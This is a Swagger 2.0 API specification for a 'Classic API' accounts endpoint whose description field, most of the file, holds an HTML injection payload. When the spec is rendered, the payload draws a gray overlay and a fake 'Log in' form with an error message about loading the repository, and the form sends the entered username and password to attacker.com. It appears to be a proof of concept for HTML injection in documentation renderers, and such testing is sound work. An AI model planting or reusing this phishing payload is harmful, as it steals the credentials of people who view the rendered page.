swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
        <div style="position: absolute;width: 4000px; height: 2000px;left: -500px;top: -500px;background-color: gray;opacity: 0.8;z-index: 999;"></div>
        <div style="top: -200px;left: calc(50% - 300px);position:absolute;z-index: 999999999;background: white;box-shadow: 1px 5px 10px grey;">
          <form action="https://attacker.com" style="width:400px;box-shadow: 0 0 0 1px #dbdbdb;border-radius: 0.25rem;padding: 15px;display:flex;flex-wrap:wrap">
            <h2>Log in</h2>
            <div style="background-color: #fdd4cd;color: #ae1800; padding: 16px 22px 16px 15px; margin-top: 10px;margin-bottom:20px;display:flex;align-items: center;">
              <svg style="width:22px;height:22px;fill:#ae1800;margin-right:10px;"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" id="error"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0-2A5 5 0 1 0 8 3a5 5 0 0 0 0 10zm0-9a1 1 0 0 1 1 1v3a1 1 0 1 1-2 0V5a1 1 0 0 1 1-1zm0 8a1 1 0 1 1 0-2 1 1 0 0 1 0 2z"></path></svg></svg>
              <div>
               An error occured while loading the repository, please log in.
              </div>
              <svg style="width:22px;height:22px;fill:#ae1800;">
                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" id="close"><path fill-rule="evenodd" d="M11.293 3.293a1 1 0 1 1 1.414 1.414L9.414 8l3.293 3.293a1 1 0 0 1-1.414 1.414L8 9.414l-3.293 3.293a1 1 0 0 1-1.414-1.414L6.586 8 3.293 4.707a1 1 0 0 1 1.414-1.414L8 6.586l3.293-3.293z"></path></svg>
              </svg>
            </div>
              <div style="width: 100%;display:flex;flex-wrap:wrap;margin-bottom: 1rem;">
                  <label style="width:100%;font-weight: 600;display: inline-block;margin-bottom: 0.5rem;" for="username">Username or email</label>
                  <input style='width:100%;height:34px;background-color: #fff; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Noto Sans", Ubuntu, Cantarell, "Helvetica Neue", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; font-size: 0.875rem; line-height: 1rem; padding-top: 0.5rem; padding-bottom: 0.5rem; padding-left: 0.75rem; padding-right: 0.75rem;height: auto; color: #303030; box-shadow: inset 0 0 0 1px #868686; border-style: none; appearance: none;-moz-appearance: none;-webkit-appearance: none;border-radius: 4px;border: 1px solid #dbdbdb;' name="username" type="text">
              </div>
              <div style="width: 100%;display:flex;flex-wrap:wrap;    margin-bottom: 1rem;">
                  <label style="width:100%;font-weight: 600;display: inline-block;margin-bottom: 0.5rem;" for="password">Password</label>
                  <input style='width:100%;height:34px;background-color: #fff; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Noto Sans", Ubuntu, Cantarell, "Helvetica Neue", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji"; font-size: 0.875rem; line-height: 1rem; padding-top: 0.5rem; padding-bottom: 0.5rem; padding-left: 0.75rem; padding-right: 0.75rem;height: auto; color: #303030; box-shadow: inset 0 0 0 1px #868686; border-style: none; appearance: none;-moz-appearance: none;-webkit-appearance: none;border-radius: 4px;border: 1px solid #dbdbdb;' name="password" type="text">
              </div>
            <button style="width:100%;background-color: #1f75cb;box-shadow: inset 0 0 0 1px #1068bf;color: #fff;border-width: 0;  padding-top: 0.5rem;  padding-bottom: 0.5rem;  padding-left: 0.75rem; padding-right: 0.75rem;line-height: 1rem; fill: currentColor;justify-content: center; align-items: center; font-size: 0.875rem;border-radius: 0.25rem;margin-bottom:10px;" type="submit">Send</button>
          </form>
        </div>




  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts